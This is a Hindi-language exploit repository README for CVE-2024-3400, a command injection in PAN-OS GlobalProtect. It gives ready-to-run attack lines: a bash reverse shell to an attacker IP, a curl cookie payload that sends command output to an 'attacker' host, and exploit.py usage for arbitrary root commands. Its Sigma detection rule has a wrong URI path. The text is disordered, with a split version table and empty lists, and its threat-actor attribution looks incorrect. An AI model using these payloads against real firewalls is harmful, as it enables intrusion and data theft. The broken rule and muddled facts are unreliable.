
cve-2024-3400-panos_rce_reproduction का पुनरुत्पादन
CVSS 10.0 CRITICAL | CWE-78: OS कमांड इंजेक्शन | वाइल्ड में बड़े पैमाने पर शोषित
CVE-2024-3400, Palo Alto Networks PAN-OS GlobalProtect पोर्टल और गेटवे इंटरफेस में एक प्री-ऑथेंटिकेशन कमांड इंजेक्शन भेद्यता है। यह भेद्यता एक बिना प्रमाणीकरण वाले हमलावर को प्रभावित फ़ायरवॉल पर रूट विशेषाधिकारों के साथ मनमाने कमांड निष्पादित करने की अनुमति देती है।
यह भेद्यता GlobalProtect पोर्टल और गेटवे घटक की सत्र कुकी हैंडलिंग में निहित है। SESSID कुकी को संसाधित करने के लिए ज़िम्मेदार फ़ंक्शन, उपयोगकर्ता द्वारा प्रदान किए गए इनपुट को शेल कमांड में पास करने से पहले ठीक से सैनिटाइज़ करने में विफल रहता है।
विशेष रूप से, एम्बेडेड शेल मेटाकैरेक्टर (बैकटिक्स और वेरिएबल एक्सपैंशन) युक्त एक क्राफ्टेड SESSID कुकी के साथ GlobalProtect पोर्टल एंडपॉइंट (/global-protect/login.esp) पर किया गया एक बिना प्रमाणीकरण वाला HTTP अनुरोध कमांड इंजेक्शन का कारण बनता है।
भेद्य कोड पथ निम्नानुसार कार्य करता है:
/global-protect/login.esp पर एक अनुरोध प्राप्त होता हैSESSID कुकी मान बिना सैनिटाइज़ेशन के निकाला जाता हैsystem() या समान OS कमांड निष्पादन फ़ंक्शन के माध्यम से निष्पादित किया जाता हैइंजेक्शन पेलोड SESSID कुकी के भीतर बैकटिक-सीमांकित कमांड का उपयोग करता है:
SESSID=/../../../opt/panlogs/tmp/device_telemetry/`COMMAND`.py
पाथ ट्रैवर्सल (/../../../) इच्छित निर्देशिका से बाहर निकल जाता है, और बैकटिक-कोटेड COMMAND भाग शेल को हमलावर के इनपुट को निष्पादित करने के लिए प्रेरित करता है। कमांड परिणामों को एक्सफ़िल्ट्रेट करने के लिए आउटपुट रीडायरेक्शन या रिवर्स शेल तंत्र का उपयोग किया जा सकता है।
| PAN-OS संस्करण | प्रभावित | ठीक किया गया |
|---|---|---|
| 10.2.x | < 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h1 | 10.2.4-h16 / 10.2.5-h6 / 10.2.6-h3 / 10.2.7-h8 / 10.2.8-h3 / 10.2.9-h1 |
| 11.0.x |
नोट: PAN-OS 9.x और पुराने संस्करण प्रभावित नहीं हैं। Cloud NGFW और Prisma Access प्रभावित नहीं हैं।
UNC4554 / Midnight Blizzard (APT29) को मार्च 2024 से शुरू होकर CVE-2024-3400 का 0-day के रूप में शोषण करते हुए देखा गया। Volexity ने 12 अप्रैल, 2024 को अपना विश्लेषण प्रकाशित किया। हमले के पैटर्न में शामिल थे:
कई सार्वजनिक PoC जारी किए गए हैं। यह रिपॉजिटरी अधिकृत परीक्षण के लिए एक कार्यात्मक एक्सप्लॉइट प्रदान करती है।
requests लाइब्रेरीpip install requests
python exploit.py --target https://vulnerable-firewall.example.com --command "id"
# Start listener on attacker machine
nc -lvnp 4444
# Execute reverse shell
python exploit.py --target https://vuln-panos.example.com \
--command "bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'"
python exploit.py --target https://vuln-panos.example.com --command "cat /etc/passwd"
# Basic command execution test
curl -k --cookie "SESSID=/../../../opt/panlogs/tmp/device_telemetry/\`id\`.py" \
'https://target/global-protect/login.esp'
# Command output capture via DNS exfiltration
curl -k --cookie "SESSID=/../../../opt/panlogs/tmp/device_telemetry/\`wget -O- http://attacker/$(id|base64)\`.py" \
'https://target/global-protect/login.esp'
इस रिपॉजिटरी में exploit.py देखें, जो एक पूर्ण-विशेषताओं वाला Python एक्सप्लॉइट है और निम्न का समर्थन करता है:
SESSID कुकी के साथ /global-protect/login.esp पर अनुरोध/../../) युक्त कुकी/opt/panlogs/tmp/device_telemetry/ में .py एक्सटेंशन के साथ लिखी गई फ़ाइलेंtitle: CVE-2024-3400 PAN-OS GlobalProtect Command Injection
status: stable
logsource:
category: webserver
detection:
selection:
cs-uri-query: "/global-protocol/login.esp"
cs-cookie|contains:
- "../"
- "`"
condition: selection
set deviceconfig system telemetry disable yes (रीबूट की आवश्यकता के बिना भेद्य कोड पथ को अवरुद्ध करता है)/opt/panlogs/tmp/device_telemetry/ में अनधिकृत फ़ाइलों की जाँच करेंSESSID कुकी मानों के लिए GlobalProtect लॉगिन लॉग का ऑडिट करेंPalo Alto Networks द्वारा प्रदान किया गया हॉटफिक्स लागू करें। फिक्स शेल कमांड निर्माण से पहले कुकी इनपुट को ठीक से सैनिटाइज़ करता है।
यदि आपको शोषण का संदेह है:
यह रिपॉजिटरी केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान की गई है। इस भेद्यता का अनधिकृत शोषण अवैध है। लेखक इस जानकारी के दुरुपयोग के लिए ज़िम्मेदार नहीं हैं। किसी भी सिस्टम का परीक्षण करने से पहले हमेशा सुनिश्चित करें कि आपके पास स्पष्ट लिखित अनुमति है।
MIT License - यह सामग्री रक्षात्मक सुरक्षा अनुसंधान और अधिकृत परीक्षण के लिए प्रदान की गई है।
| < 11.0.1-h10, < 11.0.2-h4, < 11.0.3-h10 |
| 11.0.1-h10 / 11.0.2-h4 / 11.0.3-h10 |
| 11.1.x | < 11.1.1-h3 | 11.1.1-h3 |
| स्रोत | लिंक |
|---|